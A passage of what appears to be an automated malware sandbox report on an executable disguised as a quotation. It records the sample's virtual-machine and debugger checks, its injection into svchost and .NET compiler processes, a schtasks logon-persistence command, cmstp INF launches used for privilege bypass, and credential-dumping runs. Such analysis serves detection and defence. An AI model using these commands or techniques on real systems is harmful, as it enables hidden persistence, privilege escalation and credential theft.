                        Source: svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                        Source: Amcache.hve.25.drBinary or memory string: \driver\vmci,\driver\pci
                        Source: svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                        Source: svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                        Source: Amcache.hve.25.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.25.drBinary or memory string: VMware20,1
                        Source: Amcache.hve.25.drBinary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.25.drBinary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.25.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: Amcache.hve.25.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: Amcache.hve.25.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.25.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.25.drBinary or memory string: VMware PCI VMCI Bus Device
                        Source: svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                        Source: svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                        Source: Amcache.hve.25.drBinary or memory string: VMware VMCI Bus Device
                        Source: Amcache.hve.25.drBinary or memory string: VMware Virtual RAM
                        Source: Amcache.hve.25.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: Amcache.hve.25.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPort
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 20_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_100060E2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,32_2_0040DD85
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,26_2_0041CB50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 20_2_10004AB4 mov eax, dword ptr fs:[00000030h]20_2_10004AB4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_004432B5 mov eax, dword ptr fs:[00000030h]26_2_004432B5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_004432B5 mov eax, dword ptr fs:[00000030h]45_2_004432B5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 20_2_1000724E GetProcessHeap,20_2_1000724E
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 20_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_100060E2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 20_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_10002639
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 20_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_10002B1C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_004349F9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00434B47 SetUnhandledExceptionFilter,26_2_00434B47
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_0043BB22
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00434FDC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,45_2_004349F9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_00434B47 SetUnhandledExceptionFilter,45_2_00434B47
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,45_2_0043BB22
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,45_2_00434FDC
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: QUOTATION#30810.exe, ------.csReference to suspicious API methods: LoadLibrary(_FD43_066C(_064F_FDE9_FD47_FD4E._0601_FDCD_065A))
                        Source: QUOTATION#30810.exe, ------.csReference to suspicious API methods: GetProcAddress(intPtr, _FD43_066C(_064F_FDE9_FD47_FD4E._FDEA_064B_FBC0_06D9_FBCB_FBC8))
                        Source: QUOTATION#30810.exe, ------.csReference to suspicious API methods: VirtualProtect(procAddress, (uint)array2.Length, 64u, out var _0611_064B)
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: C:\Windows\System32\svchost.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000 protect: page execute and read and write
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\System32\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000 value starts with: 4D5A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe protection: execute and read and writeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe protection: execute and read and writeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe protection: execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\System32\svchost.exe base: 400000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\System32\svchost.exe base: 401000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\System32\svchost.exe base: 459000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\System32\svchost.exe base: 471000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\System32\svchost.exe base: 477000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\System32\svchost.exe base: 478000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\System32\svchost.exe base: 479000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\System32\svchost.exe base: 47E000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 459000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 471000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 477000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 478000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 479000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 47E000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 235008Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 401000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 459000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 471000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 477000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 478000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 479000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 47E000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 5253008Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 401000
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 459000
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 471000
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 477000
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 478000
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 479000
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 47E000
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 4BE9008
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe26_2_004120F7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe45_2_004120F7
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 16_2_00007FFB4AFABC2C keybd_event,16_2_00007FFB4AFABC2C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00419627 mouse_event,26_2_00419627
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exitJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpDAAA.tmp.bat""Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\macatsxh.infJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\lmxgukvurszvufgxilvllznhpy"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\nglqvdfonaraelcbsvimoeayympwa"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\nglqvdfonaraelcbsvimoeayympwa"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\yiqjvvqpbijnhrqfbgcgyquhzthfbppay"Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 5864 -ip 5864Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5864 -s 1120Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 2772 -ip 2772Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2772 -s 1072Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 536 -p 6908 -ip 6908Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6908 -s 1076Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\54bmrp0l.inf
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\xrlumlnf.inf
                        Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager5C\a6s
                        Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerF
                        Source: vbc.exe, 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000014.00000002.4017737337.0000000007829000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: vbc.exe, 00000014.00000002.4017737337.0000000007829000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager-
                        Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager5C\*r
                        Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager5C\86)M
                        Source: vbc.exe, 00000014.00000002.4017737337.0000000007829000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager*
                        Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager5C\ws
                        Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager5C\
                        Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager5C\on
                        Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager5C\wsP/
                        Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager5C\h;
                        Source: vbc.exe, 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr Profile InstallerkP
                        Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: vbc.exe, 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                        Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager5C\a6
                        Source: vbc.exe, 00000014.00000002.4011008508.0000000000507000.00000004.00000020.00020000.00000000.sdmp, logs.dat.20.drBinary or memory string: [Program Manager]
                        Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager5C\33z
                        Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager5C\ramt
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 20_2_10002933 cpuid 20_2_10002933
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: EnumSystemLocalesW,26_2_00452036
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,26_2_004520C3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: GetLocaleInfoW,26_2_00452313
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: EnumSystemLocalesW,26_2_00448404
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,26_2_0045243C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: GetLocaleInfoW,26_2_00452543
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,26_2_00452610
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: GetLocaleInfoA,26_2_0040F8D1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: GetLocaleInfoW,26_2_004488ED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,26_2_00451CD8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: EnumSystemLocalesW,26_2_00451F50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: EnumSystemLocalesW,26_2_00451F9B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: EnumSystemLocalesW,45_2_00452036
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,45_2_004520C3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: GetLocaleInfoW,45_2_00452313
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: EnumSystemLocalesW,45_2_00448404
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,45_2_0045243C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: GetLocaleInfoW,45_2_00452543
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,45_2_00452610
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: GetLocaleInfoA,45_2_0040F8D1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: GetLocaleInfoW,45_2_004488ED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,45_2_00451CD8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: EnumSystemLocalesW,45_2_00451F50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: EnumSystemLocalesW,45_2_00451F9B
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeQueries volume information: C:\Users\user\Desktop\QUOTATION#30810.exe VolumeInformationJump to behavior
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
